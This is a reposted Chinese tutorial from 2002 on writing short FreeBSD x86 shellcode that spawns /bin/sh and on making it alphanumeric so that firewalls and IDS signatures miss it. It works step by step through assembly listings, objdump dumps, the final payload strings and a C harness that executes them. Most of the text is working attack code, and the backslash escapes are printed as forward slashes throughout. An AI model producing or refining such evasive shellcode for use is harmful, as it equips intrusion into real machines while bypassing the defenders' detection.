编写"优美"的SHELLCODE

来源：互联网发布：南昌数控编程学徒招聘编辑：程序博客网时间：2024/04/28 09:49

作者：watercloud < watercloud@nsfocus.com >
主页：http://www.nsfocus.com
日期：2002-1-4

    SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较"优美",那么就
更能体现shellcode的魅力.
个人认为shellcode的优美能在两个地方表现:
<1> shellcode本身应该尽量的短小.
<2> shellcode的书写也应该尽量的短小,并且尽量使用能书写为ascii码的机器码.

举例来讲如下两个都是FreeBSD下的shellcode,都是新开一个shell
char shellcode_1[38]=
      "/xeb/x17/x5e/x31/xc0/x88/x46/x07/x89/x76/x08/x89/x46/x0c/x8d/x5e"
      "/x08/x50/x53/x56/x56/xb0/x3b/xcd/x80/xe8/xe4/xff/xff/xff/bin/sh";

char shellcode_2[24]=
     "1/xc0Ph//shh/binT[PPSS4;/xcd/x80";

很显然shellcode_2比shellcode_1要短小精干.首先大小上shellcode_1的机器码为37
字节,shellcode_2
的机器码为23字节;其次从书写上shellcode_1为127字节,shellcode_2为32字节.
从中我们可以看到美化我们的shellcode主要也是从两个方面着手.首先尽量使自己的
代码变小,其次尽量使用
能书写为ascii码的机器码/汇编码.
当然尽量使用ascii码的好处不紧紧是使shellcode看起来美观,更重要的是现在越来
越多的防火强和IDS都开始将
网上流行的shellcode作为识别关键字,这就是说越是接近字符串的shellcode越能躲过
他们的检测.

以下我们通过简化FreeBSD上的具体shellcode来讲述美化shellcode.

首先让我们来开始编写一个简单的shellcode程序.

写如下程序test.c

/* test.c for test shellcode */
#include<stdio.h>
void main()
{
　　char *arg[2];
　　arg[0] = "/bin/sh";
　　arg[1] = NULL;
　　execve(arg[0], arg, NULL);
}
编译: gcc test.c -static -o test
用gdb来看看其系统调用是如何传递参数的: gdb test
(gdb) disass execve
Dump of assembler code for function execve:
0x8048254 <execve>:     lea    0x3b,%eax
0x804825a <execve+6>:   int    $0x80

可以看到其参数传递是通过堆栈进行的,这使得编写shellcode更是简单.
总结一下就是 int $0x80 前 al中放人0x3b 并且堆栈中依次放入

高地址:
^   [指向执行命令的指针 ]
|   [指向命令行参数的指针]
|   [指向环境变量的指针 ]
|   [execve函数返回地址 ]
低地址

就一切搞定!
写一个小程序 t.c
main(){}

gcc -S t.c
得到汇编框架程序t.s
cat t.s

        .file   "t.c"
        .version        "01.01"
gcc2_compiled.:
.text
        .p2align 2,0x90
.globl main
                .type            main,@function
main:
        pushl %ebp
        movl %esp,%ebp
.L2:
        leave
        ret
.Lfe1:
                .size            main,.Lfe1-main
        .ident "GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)"

好了我们得到了一个汇编程序框架了，在此基础上简化一下，编写一个汇编程序test.s
如下
.text
        .p2align 2,0x90
.globl main
                .type            main,@function
main:
        jmp next
real:
        popl %esi           ; esi指向"/bin/sh"
        xorl %eax,%eax      ; eax=0

        movb %al,0x7(%esi) ; "/bin/sh"后添加一个'/0'
        movl %esi,0x8(%esi) ; 在"/bin/sh/0"后面构造char *arg[2]; arg[0]=esi
指向"/bin/sh"
        movl %eax,0xc(%esi) ; arg[1]=0
        leal 0x8(%esi),%ebx ; ebx相当于arg
        pushl %eax           ; 压入0 相当于压入execve(arg[0],arg,NULL)中的
NULL
        pushl %ebx           ; 压入arg
        pushl %esi           ; 压入arg[0] 即"/bin/sh"的开始地址
        pushl %esi           ; execve的返回地址，这里就随便给一个就行了
        movb $0x3b,%al
        int   $0x80
next:
         call real
        .string "/bin/sh"
.end
                .size            main,.end-main

编译: gcc test.s -o test
运行看看
bash-2.05$ ./test
Bus error (core dumped)   奇怪！
想想看代码段默认是只读不可写而"/bin/sh"放在代码段中，我们在其后构造char
*arg[2]
向里边赋值肯定出错.

解决办法：把test.s开头的.text改为.data告诉gcc这里的数据可读可写，作数据段，
嘿嘿
修改后再编译，再运行
bash-2.05$ ./test
$

看成功了！

我们来看看其机器码objdump -D test
其中我们可以看到:
. . . .
080494c0 <main>:
80494c0:       eb 17                   jmp    80494d9 <next>
080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       89 76 08                mov    %esi,0x8(%esi)
80494cb:       89 46 0c                mov    %eax,0xc(%esi)
80494ce:       8d 5e 08                lea    0x8(%esi),%ebx
80494d1:       50                      push   %eax
80494d2:       53                      push   %ebx
80494d3:       56                      push   %esi
80494d4:       56                      push   %esi
80494d5:       b0 3b                   mov    $0x3b,%al
80494d7:       cd 80                   int    $0x80

080494d9 <next>:
80494d9:       e8 e4 ff ff ff          call   80494c2 <real>
. . . . .

摘取下来作为我们的shellcode如下:
"/xeb/x17/x5e/x31/xc0/x88/x46/x07/x89/x76/x08/x89/x46/x0c/x8d/x5e
   /x08/x50/x53/x56/x56/xb0/x3b/xcd/x80/xe8/xe4/xff/xff/xff/bin/sh";
共37字节。

测试一下：写一个测试程序testshell.c如下
#include<stdio.h>
char sh[]=
"/xeb/x17/x5e/x31/xc0/x88/x46/x07/x89/x76/x08/x89/x46/x0c/x8d/x5e"
"/x08/x50/x53/x56/x56/xb0/x3b/xcd/x80/xe8/xe4/xff/xff/xff/bin/sh";
main()
{
long p[1];
p[2]=sh;
}

编译运行:
bash-2.05$ gcc testshell.c -o testshell
testshell.c: In function `main':
testshell.c:7: warning: assignment makes integer from pointer without a cast
bash-2.05$ ./testshell
$

成功是成功了，但我们发行代码很长，其主要代码花费在构造并赋值给char * arg[2]
上.
那么我们看看execve("/bin/sh",0,0);在FreeBSD上能用吗.(注：在Linux上不行，必须
给命令行参数
argv[0]赋值)

写一个测试程序test.c
int main(){execve("/bin/sh",0,0)}
编译并运行:
bash-2.05$ gcc test.c
test.c: In function `main':
test.c:2: warning: return type of `main' is not `int'
bash-2.05$ ./a.out
$
看来在FreeBSD上编写shellcode更加简单了。不用构造命令行参数那么就简单多了.
再写一个test.s编译后用objdump -D test 看到如下:
080494c0 <main>:
80494c0:       eb 0e                   jmp    80494d0 <next>

080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       50                      push   %eax
80494c9:       50                      push   %eax
80494ca:       56                      push   %esi
80494cb:       56                      push   %esi
80494cc:       b0 3b                   mov    $0x3b,%al
80494ce:       cd 80                   int    $0x80

080494d0 <next>:
80494d0:       e8 ed ff ff ff          call   80494c2 <real>

这次的shellcode就变成了:
"/xeb/x0e/x5e/x31/xc0/x88/x46/x07/x50/x50/x56/x56/xb0/x3b/xcd/x80/xe8/xed/xf
f/xff/xff/bin/sh"
共28字节.
接下来我们把他换个写法，里边凡是能用字符表示的我们就用字符书写:
"/xeb/x0e^1/xc0/x88F/aPPVV/xb0;/xcd/x80/xe8/xed/xff/xff/xff/bin/sh"
看精简多了吧!
但由于"/x88F"在c语言的字符串中好像有特殊含义，不是很清楚，因为
main(){printf("/x88F");}在编译时
warning: escape sequence out of range for character

看来只能写成:
"/xeb/x0e^1/xc0/x88F""/aPPVV/xb0;/xcd/x80/xe8/xed/xff/xff/xff/bin/sh"
把它分为两段字符串来写。

其中能使用字符的ascii范围为:0x21 - 0x7E 和几个特殊字符
0x7 -- '/a'
0x8 -- '/b'
0xc -- '/f'
0xb -- '/v'
0xd -- '/r'
0xa -- '/n'

查一下汇编手册我们就可以知道哪些汇编语句对应的机器码可用字符书写.
不过Phrack57上已经有人总结了，我们也就不用如此费神了引用过来如下:

hexadecimal opcode | char | instruction
-------------------+------+--------------------------------
30 </r>            | '0' | xor <r/m8>,<r8>
31 </r>            | '1' | xor <r/m32>,<r32>
32 </r>            | '2' | xor <r8>,<r/m8>
33 </r>            | '3' | xor <r32>,<r/m32>
34 <imm8>          | '4' | xor al,<imm8>
35 <imm32>         | '5' | xor eax,<imm32>
36                 | '6' | ss:   (Segment Override Prefix)
37                 | '7' | aaa
38 </r>            | '8' | cmp <r/m8>,<r8>
39 </r>            | '9' | cmp <r/m32>,<r32>
41                 | 'A' | inc ecx
42                 | 'B' | inc edx
43                 | 'C' | inc ebx
44                 | 'D' | inc esp
45                 | 'E' | inc ebp
46                 | 'F' | inc esi
47                 | 'G' | inc edi
48                 | 'H' | dec eax
49                 | 'I' | dec ecx
4A                 | 'J' | dec edx
4B                 | 'K' | dec ebx
4C                 | 'L' | dec esp
4D                 | 'M' | dec ebp
4E                 | 'N' | dec esi
4F                 | 'O' | dec edi
50                 | 'P' | push eax
51                 | 'Q' | push ecx
52                 | 'R' | push edx
53                 | 'S' | push ebx
54                 | 'T' | push esp
55                 | 'U' | push ebp
56                 | 'V' | push esi
57                 | 'W' | push edi
58                 | 'X' | pop eax
59                 | 'Y' | pop ecx
5A                 | 'Z' | pop edx
61                 | 'a' | popa
62 <...>           | 'b' | bound <...>
63 <...>           | 'c' | arpl <...>
64                 | 'd' | fs:   (Segment Override Prefix)
65                 | 'e' | gs:   (Segment Override Prefix)
66                 | 'f' | o16:    (Operand Size Override)
67                 | 'g' | a16:    (Address Size Override)
68 <imm32>         | 'h' | push <imm32>
69 <...>           | 'i' | imul <...>
6A <imm8>          | 'j' | push <imm8>
6B <...>           | 'k' | imul <...>
6C <...>           | 'l' | insb <...>
6D <...>           | 'm' | insd <...>
6E <...>           | 'n' | outsb <...>
6F <...>           | 'o' | outsd <...>
70 <disp8>         | 'p' | jo <disp8>
71 <disp8>         | 'q' | jno <disp8>
72 <disp8>         | 'r' | jb <disp8>
73 <disp8>         | 's' | jae <disp8>
74 <disp8>         | 't' | je <disp8>
75 <disp8>         | 'u' | jne <disp8>
76 <disp8>         | 'v' | jbe <disp8>
77 <disp8>         | 'w' | ja <disp8>
78 <disp8>         | 'x' | js <disp8>
79 <disp8>         | 'y' | jns <disp8>
7A <disp8>         | 'z' | jp <disp8>

看！有点启发了吧.
看看我们以前的代码:
080494c0 <main>:
80494c0:       eb 0e                   jmp    80494d0 <next> ;能用
je/jn/jb...就好了
080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax ;放到main开头的话
就能用je代替jmp了
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       50                      push   %eax
80494c9:       50                      push   %eax
80494ca:       56                      push   %esi
80494cb:       56                      push   %esi
80494cc:       b0 3b                   mov    $0x3b,%al ;可以用xorb
$0x3b,%al
80494ce:       cd 80                   int    $0x80
. . . . .

修改之后如下:

080494c0 <main>:
80494c0:       31 c0                   xor    %eax,%eax
80494c2:       74 0c                   je     80494d0 <next>

080494c4 <real>:
80494c4:       5f                      pop    %edi
80494c5:       50                      push   %eax
80494c6:       50                      push   %eax
80494c7:       57                      push   %edi
80494c8:       57                      push   %edi
80494c9:       88 47 07                mov    %al,0x7(%edi)
80494cc:       34 3b                   xor    $0x3b,%al
80494ce:       cd 80                   int    $0x80

080494d0 <next>:
80494d0:       e8 ef ff ff ff          call   80494c4 <real>

对应代码为:
"1/xc0t/f_PPWW/x88G/a4;/xcd/x80/xe8/xef/xff/xff/xff/bin/sh"
共28字节，书写57字节.
看，又简化写了吧.

现在代码主要浪费在了call real 和给"/bin/sh"最后一字节添加'/0'上了，我们能不
能
打破
jmp next
real:
   . . .
next:
   call real
   .string "/bin/sh"

这一体系呢？
问题的关键在于FreeBSD上我们的shellcode只要一个字符串，数据量很小，我们完全可
以
考虑用堆栈存放该字符串。
我们事先将"/bin/sh" push到堆栈中。
但字符串要以/0结尾所以我们还是需要在其后添加/0，我们可以先push一个 0到堆栈中
去
而/bin/sh为7个字符，我们可以用/bin//sh代替，效果相同。

以此为思路我们最终编写如下:

0804847c <main>:
804847c:       31 c0                   xor    %eax,%eax
804847e:       50                      push   %eax        ; pushl 0
804847f:       68 2f 2f 73 68          push   $0x68732f2f ; pushl
"file://sh"
8048484:       68 2f 62 69 6e          push   $0x6e69622f ; pushl "/bin"
8048489:       54                      push   %esp
804848a:       5b                      pop    %ebx        ; 取得"/bin/sh"地
址
804848b:       50                      push   %eax
804848c:       50                      push   %eax
804848d:       53                      push   %ebx
804848e:       53                      push   %ebx
804848f:       34 3b                   xor    $0x3b,%al
8048491:       cd 80                   int    $0x80

对应shellcode为:
"1/xc0Ph//shh/binT[PPSS4;/xcd/x80"

当然我们也可以将 xor %eax,%eax 写为:
pushl $0x32323232   ; pushl "2222"
popl %eax
xorl $0x32323232,%eax
这样整个shellcode中就只剩下/xcd/x80不是字符了，但好像有点得不偿失。

最后是不是想把/xcd/x80也给换一换？

不过不要太乐观了，要替换掉它就有点难度了，这得要操作具体的esp位置，这里
就不多作讨论了，有兴趣可参见phrack57#

个人的一点愚见，忘大家指正。

参考:
微软masm32 v6 帮助手册
phrack57# Writing ia32 alphanumeric shellcodes